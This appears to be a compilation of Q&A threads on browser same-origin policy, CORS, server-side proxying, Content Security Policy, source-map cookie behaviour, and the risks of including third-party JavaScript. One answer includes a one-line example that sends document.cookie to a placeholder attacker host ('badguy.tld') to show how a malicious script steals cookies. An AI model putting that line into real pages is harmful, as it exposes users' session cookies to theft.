I'm writing a web app in JavaScript which needs to access a third-party API (located on x.apisite.com and y.apisite.com). I was using XMLHttpRequest, but when serving the files from my own local server, this fails because of the same-origin policy.
Now, this web app is supposed to be installed on my mobile device, where any downloaded files will be cached. So, I changed my DNS entries to point x.apisite.com and y.apisite.com to my own local server, downloaded the files, and then changed the DNS entries back to the correct ones. I thought that since the browser thinks the scripts were downloaded from *.apisite.com, I could now make XMLHttpRequest calls to *.apisite.com. However, this does not seem to be the case; I still get same-origin policy errors.
What am I doing wrong?
Here's the basic idea of what I'm doing:
<!DOCTYPE html>
<html>
<head>
<!-- this will actually be downloaded from my own local server -->
<script src="http://x.apisite.com/script-0.js">
<script src="http://y.apisite.com/script-1.js">
...
In script-0.js, I make an XMLHttpRequest to x.apisite.com, and likewise in script-1.js, I access y.apisite.com.
Practical answer (not recommended): Create CNAME records pointing from domains you control to the third-party domains, then use your domains and hope that the third-party hosts aren't looking at the HTTP Host header. Note that this also wouldn't work if the clients attempt to authenticate the third-party hosts, for example when using HTTPS (some client browsers may force the use of HTTPS in certain scenarios).
Ideal answer: Ask the third party to authorize requests made by code that came from your origin domain using CORS (some hosts already allow requests from code of any origin; you should check that).
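For illustration, here is a minimal sketch (the endpoint path is made up) of what the client-side call looks like once the third party enables CORS; the browser adds the Origin header itself and only hands the response to your code if the server replies with a matching Access-Control-Allow-Origin header:

var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://x.apisite.com/some-endpoint'); // hypothetical endpoint
xhr.onload = function () {
  // Reached only if the response carried an acceptable Access-Control-Allow-Origin header.
  console.log(xhr.responseText);
};
xhr.onerror = function () {
  // Fired (with no details) when the cross-origin check fails.
  console.error('Request blocked or failed');
};
xhr.send();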
Alternative: If the third party doesn't want to give clients the go-ahead to make cross-origin requests with code from your domain, then you have to make those requests yourself, from your server. The code you send to the client browsers will then only interact with the same origin. This also means that users will have to trust you with their credentials if you're proxying requests for them (if that's relevant), or that you must have credentials of your own that authenticate your server to the third-party hosts and allow you to do whatever it is you want to do there. It also means you take on the traffic load, which may or may not be heavy depending on the application. There are potentially many other implications, all deriving from the fact that you explicitly take responsibility for these requests.
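As a rough sketch of that alternative (Node.js and a made-up third-party endpoint are assumed here; adapt to whatever stack you actually run), the client talks only to your origin and your server forwards the request:

const http = require('http');
const https = require('https');

http.createServer(function (req, res) {
  if (req.url === '/api/data') {
    // Forward the request server-side; the browser only ever talks to our own origin.
    https.get('https://x.apisite.com/data', function (upstream) { // hypothetical endpoint
      res.writeHead(upstream.statusCode, { 'Content-Type': 'application/json' });
      upstream.pipe(res); // stream the third-party response back to the client
    }).on('error', function () {
      res.writeHead(502);
      res.end('Upstream request failed');
    });
  } else {
    res.writeHead(404);
    res.end();
  }
}).listen(8080);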
Note: While this may sound a bit complicated, it is useful to understand the trust mechanics between the user, the user's client browser, the code executing in the browser, the origin of that code, and the domains to which that code makes requests. Keep the best interests of each party in mind and it'll be easy to find a solution for your specific problem.
Final answer (everybody hates it, but you probably expected it): "It depends on what exactly you're trying to do." (Sorry.)
Related
I have logic on my server that mostly makes curl requests (e.g. accessing social networks). However, some of those sites will soon start blocking my server's IPs.
I can, of course, use a VPN or deploy multiple servers per location, but it won't be accurate, and some of the networks might still block the user's account.
I am trying to find a creative solution to run this from the user's browser (it is OK to ask for permission, as it is an action the user is explicitly trying to execute). However, I am trying to avoid extra installations (e.g. downloadable plugins/extensions or a desktop app).
Is there a way to turn the client browser into a proxy for my server, so those curl-style calls run from the user's machine instead of being sent from my own server (e.g. using WebSockets, polling, etc.)?
It depends on exactly what sort of curl requests you are making. In theory, you could simulate these using an XMLHttpRequest. However, for security reasons these are generally not allowed to access resources hosted on a different site. (Imagine the sort of issues it could cause for instance if visiting any website could cause your browser to start making requests to Facebook to send messages on your behalf.) Basically it will depend on the Cross-origin request policy of the social networks that you are querying. If the requests being sent are intended to be publicly available without authentication then it is possible that your system will work, otherwise it will probably be blocked.
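As a sketch (the URL is hypothetical), the browser-side version of such a request would look something like this; whether it succeeds is entirely up to the remote site's CORS headers:

fetch('https://api.social-network.example/public/profile/123')
  .then(function (res) { return res.json(); }) // works only if the endpoint sends Access-Control-Allow-Origin
  .then(function (data) { console.log(data); })
  .catch(function (err) {
    // Authenticated or CORS-restricted endpoints will typically end up here.
    console.error('Blocked by the cross-origin request policy:', err);
  });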
I have some HTML/PHP pages that include JavaScript calls.
Those calls point to JS/PHP methods in a library (Piwik) stored on a remote server.
They are triggered using an http://www.domainname.com/ prefix to point to the correct files.
I cannot modify the source code of the library.
When my own HTML/PHP pages are previewed locally in a browser (I mean using a c:\xxxx kind of path, not a localhost://xxxx one), the remote scripts are still called and do their processing.
I don't want this to happen; those scripts should only execute if they are called from a www.domainname.com page.
Can you help me secure this?
One can of course directly bypass this protection by modifying the web pages on the fly with some browser add-on while browsing the real web site, but that is a little bit harder to achieve.
I've opened an issue on the Piwik issue tracker, but I would like to secure my web site and its statistics from this issue as soon as possible, while waiting for a future Piwik update.
EDIT
The process I'd like to put in place would be:
Someone opens a page from anywhere other than www.domainname.com
> this page calls a JS method on a remote server (or not, it may be copied locally),
> this script calls a PHP script on the remote server,
> the PHP script says "hey, where on earth are you calling me from? Go away!", or the PHP script simply does not execute.
I've tried to play with .htaccess for that, but as any JS script must be on a client, it also blocks the legitimate calls from www.domainname.com.
Untested, but I think you can use php_sapi_name() or the PHP_SAPI constant to detect the interface PHP is using, and do logic accordingly.
Not wanting to sound cheeky, but your situation sounds rather scary and I would advise searching for some PHP configuration best practices regarding security ;)
Edit after the question has been amended twice:
Now the problem is more clear. But you will struggle to secure this if the JavaScript and PHP are not on the same server.
If they are not on the same server, you will be reliant on HTTP headers (like the Referer or Origin header) which are fakeable.
But Piwik already tracks the referrer ("Piwik uses first-party cookies to keep track of some information (number of visits, original referrer, and unique visitor ID)"), so you can discount hits from invalid referrers.
If that is not enough, the standard way of being sure that a request to a web service comes from a verified source is to use a standard Cross-Site Request Forgery prevention technique -- a CSRF "token", sometimes also called a "crumb" or "nonce" -- and as this is analytics software I would be surprised if Piwik does not do this already, if it is possible with their architecture. I would ask them.
Most web frameworks these days have CSRF token generators and APIs you should be able to make use of, and it's not hard to make your own, but if you cannot amend the JS you will have problems passing the token around. Again, the Piwik JS API may have methods for passing session IDs and similar data around.
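To make the idea concrete, here is a minimal sketch of the token mechanism in JavaScript (Node.js assumed; this is not Piwik's actual implementation): the server issues a random token with each page it serves and only honours requests that echo a known token back.

const crypto = require('crypto');

const issuedTokens = new Set();

function issueToken() {
  const token = crypto.randomBytes(16).toString('hex');
  issuedTokens.add(token); // in practice, store per session with an expiry
  return token;            // embed this in the page served from www.domainname.com
}

function isValidRequest(tokenFromRequest) {
  return issuedTokens.has(tokenFromRequest); // reject hits that don't carry a known token
}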
Original answer
This can be accomplished with a Content Security Policy to restrict the domains that scripts can be called from:
CSP defines the Content-Security-Policy HTTP header that allows you to create a whitelist of sources of trusted content, and instructs the browser to only execute or render resources from those sources.
Therefore, you can set the script policy to 'self' to only allow scripts from your current origin (the local file system) to be executed. Any remote ones will not be allowed.
Normally this would only be available from a source where you can set HTTP headers, but as you are running from the local file system this is not possible. However, you may be able to get around this with the http-equiv <meta> tag:
Authors who are unable to support signaling via HTTP headers can use tags with http-equiv="X-Content-Security-Policy" to define their policies. HTTP header-based policy will take precedence over tag-based policy if both are present.
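As a sketch of the header-based variant (Node.js is assumed here purely for illustration), with the equivalent meta tag shown in the comment for pages where you cannot set headers:

const http = require('http');

http.createServer(function (req, res) {
  // Only allow scripts from the page's own origin; remote scripts will be blocked.
  // Meta-tag equivalent: <meta http-equiv="Content-Security-Policy" content="script-src 'self'">
  res.setHeader('Content-Security-Policy', "script-src 'self'");
  res.end('<html><head></head><body>...</body></html>');
}).listen(8080);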
Answer after question edit
Look into the Referer or Origin HTTP headers. Referer is available for most requests; however, it is not sent from HTTPS resources in the browser, and if the user has a proxy or privacy plugin installed, it may be blocked.
Origin is only available for XHR requests made cross-domain (or, in some browsers, even for same-domain requests).
You can check that these headers contain your domain, i.e. the one the scripts should be called from. This can be done with .htaccess rules.
At the end of the day this doesn't make it secure, but, in your own words, it will make it "a little bit harder to achieve".
Regarding source maps, I came across some strange behaviour in Chromium (build 181620).
In my app I'm using minified jQuery, and after logging in I started seeing HTTP requests for "jquery.min.map" in the server log file. Those requests were lacking cookie headers (all other requests were fine).
Those requests are not even shown in the Network tab in Developer Tools (which doesn't bug me that much).
The point is, the JS files in this app are only supposed to be available to logged-in clients, so in this setup the source maps either won't work or I'd have to move the source map to a public directory.
My question is: is this a desired behavior (meaning - source map requests should not send cookies) or is it a bug in Chromium?
The String InspectorFrontendHost::loadResourceSynchronously(const String& url) implementation in InspectorFrontendHost.cpp, which is called for loading sourcemap resources, uses the DoNotAllowStoredCredentials flag, which I believe results in the behavior you are observing.
This method is potentially dangerous, so this flag is there for us (you) to be on the safe side and avoid leaking sensitive data.
As a side note, giving jquery.min.js out only to logged-in users (that is, not serving it from a cookieless domain) is not a very good idea in a production environment. I'm not sure about your idea behind this, but if you definitely need to avoid giving the file to clients not visiting your site, you may resort to checking the Referer HTTP request header.
I encountered this problem and became curious as to why certain authentication cookies were not sent in requests for .js.map files to our application.
In my testing using Chrome 71.0.3578.98, if the SameSite cookie attribute is set to either Strict or Lax for a cookie, Chrome will not send that cookie when requesting the .js.map file. When there is no SameSite restriction, the cookie will be sent.
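For reference, a minimal sketch (Node.js assumed, cookie names made up) of how such cookies would be issued; in my tests only the unrestricted one accompanied the .js.map request:

const http = require('http');

http.createServer(function (req, res) {
  res.setHeader('Set-Cookie', [
    'session=abc123; HttpOnly; SameSite=Strict', // withheld from the source-map request
    'tracking=xyz789'                            // no SameSite restriction: sent as usual
  ]);
  res.end('ok');
}).listen(3000);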
I'm not aware of any specification of the intended behavior.
Meaning, if I have a website and I link to an external .js file, say for jQuery or some widget service, they can pretty easily just pull my authentication cookie and then log in as me, correct?
What if I am under SSL?
If you include Javascript or JSONP code from another domain, that code has full client-side power and can do whatever it wants.
It can send AJAX requests to automatically make your user do things, and it can steal document.cookie.
If your authentication cookies are HTTP-only, it can't steal them, but it can still impersonate the user using AJAX.
Never include a JS file from a domain you don't trust.
If your page uses SSL, all Javascript files must also use SSL, or an attacker can modify the un-encrypted Javascript to do whatever he wants.
For this reason, browsers will show a security warning if an SSL page uses non-SSL resources.
Note that JSONP is no exception to this rule.
Any JSONP response has full access to your DOM.
If security is a concern, do not use untrusted JSONP APIs.
I can only agree with SLaks and Haochi (+1 and all).
It is extremely insecure and you should never do it even if you trust the domain. Don't trust the answers that tell you that this is not the case because they are just wrong.
This is why literally all of the links to JavaScript libraries hosted on Google's CDN in the Developer's Guide to the Google Libraries API are now secure HTTPS links, even though encrypting all of that traffic means a huge overhead, even for Google.
They used to recommend using HTTPS only for websites that use HTTPS themselves, now there are no HTTP links in the examples at all.
The point is that you can trust Google and their CDN, but you can never trust the local DNS and routers in some poor schmuck's cafe from which your visitors may be connecting to your website, and Google's CDN is a great target for obvious reasons.
It depends on what you mean by "pull". As others have said here, cookies are only sent to the domain they originated from. However, a third-party file (with malicious intent) can still send your cookies back to its own server by executing some JavaScript code like:
// e.g. exfiltrate the cookies via an image request to the attacker's server
new Image().src = "http://badguy.tld/?" + encodeURIComponent(document.cookie);
So, only include scripts from trusted sources (Google, Facebook, etc)
No, because cookies for your site will only be sent to your domain.
For example, when your browser sees yoursite.com it will send the authentication cookie for yoursite.com. If it also has to make a different request for jQuery (for the .js script), it won't send the cookie for yoursite.com (but it will send a cookie for the jQuery host, assuming one exists).
Remember, every resource is a separate request under HTTP.
I am not sure HttpOnly is fully supported across all browsers, so I wouldn't trust it to prevent attacks by itself.
If you're worried about a 3rd party attacker (i.e., not the site offering the JS file) grabbing the cookies, definitely use SSL and secure cookies.
If your page isn't running on SSL, using HttpOnly cookies doesn't actually prevent a man-in-the-middle attack, since an attacker in the middle can intercept the cookies regardless by just pretending to be your domain.
If you don't trust the host of an external .js file, don't use the external .js file. An external JS file can rewrite the entire page DOM to ask for a credit card number to be submitted to anyone and have it look (to an average user) the same as your own page, so you're pretty much doomed if you're getting malicious .js files. If you're not sure whether a .js host is trustworthy, host a copy of it locally (and check the file for security holes) or don't use it at all. Generally I prefer the latter.
In the specific case of JQuery, just use the copy on Google's CDN if you can't find a copy you like better.
Cookies are domain-specific and guarded by the same-origin policy.
I have a server on our company intranet that runs JBoss. I want to send API calls to this server from my machine, also on the intranet, and get the resulting XML responses using jQuery.
I read the entry on Wikipedia but am confused about how that applies to my situation, since our machines only have IP addresses, not domain names.
I have
server URL: 10.2.200.3:8001/serviceroot/service
client IP address: 10.2.201.217
My questions are:
1. As far as I understand, these are different domains, right?
2. So I have to use a proxy to issue jQuery.ajax calls to the server?
3. If I want to avoid doing (2), can I install Apache on the server and serve the page with the JS code from there? But then the JS will be from 10.2.200.3 and the server is at 10.2.200.3:8001. Aren't these considered different domains according to the policy?
Thanks!
Yes.
Yes, different ports mean different origins. This is something that most browsers have done in JS for a while, but it is explicitly described in the HTML5 draft, which is referenced by the XMLHttpRequest draft.
If A and B have port components that are not identical, return false.
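A quick way to see this from the browser console (addresses taken from the question):

const a = new URL('http://10.2.200.3/');                         // page served from port 80
const b = new URL('http://10.2.200.3:8001/serviceroot/service'); // JBoss service on port 8001
console.log(a.origin);              // "http://10.2.200.3"
console.log(b.origin);              // "http://10.2.200.3:8001"
console.log(a.origin === b.origin); // false -> cross-origin, so XMLHttpRequest is blocked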
If the port or address is different, it is a different origin. If you need to access information from what is effectively another server, you really have two options. One is to write some sort of reverse proxy to pass your requests from the same-origin server to the secondary server.
Alternatively, if you are in control of the secondary target, and there's no security risk in providing direct access, you could consider adjusting the secondary server to emit JSON-P responses.
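A minimal sketch of the JSON-P pattern (assuming the secondary server can be taught to wrap its response in a callback; the parameter name is hypothetical):

// The secondary server would respond with something like: handleData({"some": "data"});
function handleData(data) {
  console.log('Got data from the secondary server:', data);
}

var s = document.createElement('script');
s.src = 'http://10.2.200.3:8001/serviceroot/service?callback=handleData'; // server must support the callback parameter
document.head.appendChild(s);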